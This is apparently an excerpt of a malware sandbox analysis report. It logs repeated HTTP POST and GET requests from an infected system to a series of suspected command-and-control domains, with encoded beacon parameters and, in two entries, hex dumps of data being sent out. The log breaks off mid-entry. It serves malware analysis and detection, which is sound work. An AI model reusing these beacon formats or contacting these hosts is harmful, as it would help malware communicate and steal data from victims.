        Source: global trafficHTTP traffic detected: GET /qo4k/?oz=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /yyvd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dhkatp.vipOrigin: http://www.dhkatp.vipReferer: http://www.dhkatp.vip/yyvd/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /yyvd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dhkatp.vipOrigin: http://www.dhkatp.vipReferer: http://www.dhkatp.vip/yyvd/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /yyvd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dhkatp.vipOrigin: http://www.dhkatp.vipReferer: http://www.dhkatp.vip/yyvd/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /yyvd/?oz=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dhkatp.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /iydt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickOrigin: http://www.tempatmudisini01.clickReferer: http://www.tempatmudisini01.click/iydt/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /iydt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickOrigin: http://www.tempatmudisini01.clickReferer: http://www.tempatmudisini01.click/iydt/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /iydt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickOrigin: http://www.tempatmudisini01.clickReferer: http://www.tempatmudisini01.click/iydt/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qwk1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.komart.shopOrigin: http://www.komart.shopReferer: http://www.komart.shop/qwk1/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qwk1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.komart.shopOrigin: http://www.komart.shopReferer: http://www.komart.shop/qwk1/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qwk1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.komart.shopOrigin: http://www.komart.shopReferer: http://www.komart.shop/qwk1/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qwk1/?oz=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /ytua/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dxeg.lolOrigin: http://www.dxeg.lolReferer: http://www.dxeg.lol/ytua/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /ytua/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dxeg.lolOrigin: http://www.dxeg.lolReferer: http://www.dxeg.lol/ytua/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /ytua/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dxeg.lolOrigin: http://www.dxeg.lolReferer: http://www.dxeg.lol/ytua/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /ytua/?oz=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dxeg.lolConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /dlt0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.tukaari.shopOrigin: http://www.tukaari.shopReferer: http://www.tukaari.shop/dlt0/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 77 6b 4e 4e 78 67 46 47 59 64 70 65 4d 58 57 5a 54 75 33 71 46 74 64 65 4e 46 52 6d 59 65 35 6b 44 4d 61 65 50 6a 4b 68 76 4d 7a 38 56 68 71 52 39 6b 70 5a 34 72 48 6e 70 51 77 52 2b 76 43 62 46 4d 57 58 48 7a 54 48 46 65 52 57 71 4e 54 78 41 52 57 74 6d 30 6a 62 62 52 48 71 2b 71 4d 35 71 64 6d 77 61 43 7a 50 5a 54 69 74 74 43 67 49 58 50 74 79 53 50 4c 67 33 4f 31 37 76 47 56 61 2f 58 33 41 5a 74 7a 75 78 32 4f 59 42 58 39 36 44 63 34 4a 77 32 57 2f 37 49 6d 44 62 34 45 71 4d 4d 78 39 67 44 43 4e 70 32 64 79 38 4d 58 2f 56 5a 61 71 73 48 77 54 4d 54 73 6d 6b 52 48 30 48 51 3d 3d Data Ascii: oz=wkNNxgFGYdpeMXWZTu3qFtdeNFRmYe5kDMaePjKhvMz8VhqR9kpZ4rHnpQwR+vCbFMWXHzTHFeRWqNTxARWtm0jbbRHq+qM5qdmwaCzPZTittCgIXPtySPLg3O17vGVa/X3AZtzux2OYBX96Dc4Jw2W/7ImDb4EqMMx9gDCNp2dy8MX/VZaqsHwTMTsmkRH0HQ==
        Source: global traffic HTTP traffic detected: POST /dlt0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.tukaari.shop Origin: http://www.tukaari.shop Referer: http://www.tukaari.shop/dlt0/ Content-Length: 219 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /dlt0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.tukaari.shop Origin: http://www.tukaari.shop Referer: http://www.tukaari.shop/dlt0/ Content-Length: 7367 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: GET /dlt0/?oz=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.tukaari.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /tcs6/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.invicta.world Origin: http://www.invicta.world Referer: http://www.invicta.world/tcs6/ Content-Length: 199 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /tcs6/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.invicta.world Origin: http://www.invicta.world Referer: http://www.invicta.world/tcs6/ Content-Length: 219 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /tcs6/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.invicta.world Origin: http://www.invicta.world Referer: http://www.invicta.world/tcs6/ Content-Length: 7367 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: GET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.invicta.world Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /bqye/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.whats-in-the-box.org Origin: http://www.whats-in-the-box.org Referer: http://www.whats-in-the-box.org/bqye/ Content-Length: 199 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /bqye/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.whats-in-the-box.org Origin: http://www.whats-in-the-box.org Referer: http://www.whats-in-the-box.org/bqye/ Content-Length: 219 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /bqye/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.whats-in-the-box.org Origin: http://www.whats-in-the-box.org Referer: http://www.whats-in-the-box.org/bqye/ Content-Length: 7367 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: GET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.whats-in-the-box.org Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /was5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.linkwave.cloud Origin: http://www.linkwave.cloud Referer: http://www.linkwave.cloud/was5/ Content-Length: 199 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /was5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.linkwave.cloud Origin: http://www.linkwave.cloud Referer: http://www.linkwave.cloud/was5/ Content-Length: 219 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /was5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.linkwave.cloud Origin: http://www.linkwave.cloud Referer: http://www.linkwave.cloud/was5/ Content-Length: 7367 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: GET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.linkwave.cloud Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /7k8f/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.dfmagazine.shop Origin: http://www.dfmagazine.shop Referer: http://www.dfmagazine.shop/7k8f/ Content-Length: 199 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /7k8f/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.dfmagazine.shop Origin: http://www.dfmagazine.shop Referer: http://www.dfmagazine.shop/7k8f/ Content-Length: 219 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /7k8f/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.dfmagazine.shop Origin: http://www.dfmagazine.shop Referer: http://www.dfmagazine.shop/7k8f/ Content-Length: 7367 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: GET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.dfmagazine.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /txr6/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.ngmr.xyz Origin: http://www.ngmr.xyz Referer: http://www.ngmr.xyz/txr6/ Content-Length: 199 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 51 2b 49 74 78 64 77 36 5a 6d 5a 52 62 66 30 66 54 6f 33 72 49 36 49 65 7a 72 4c 68 68 52 41 55 62 51 35 42 70 4b 6a 57 7a 4f 6e 54 67 34 7a 6d 63 34 38 7a 6d 38 69 4b 42 71 55 58 39 5a 42 55 67 42 73 71 4a 36 4f 45 38 62 6f 6f 75 66 33 6e 33 7a 62 61 75 7a 4a 68 6f 65 7a 36 67 63 34 55 75 77 37 6f 67 73 74 63 77 78 61 78 74 43 50 39 4f 47 78 68 6d 75 4e 75 34 6a 59 6e 4a 33 74 72 2f 7a 30 49 76 6f 69 6c 64 5a 65 35 70 49 4f 70 74 4b 74 50 71 50 30 65 50 52 51 4f 55 49 34 57 77 46 6f 4d 43 75 35 47 54 78 4f 61 4d 3d Data Ascii: 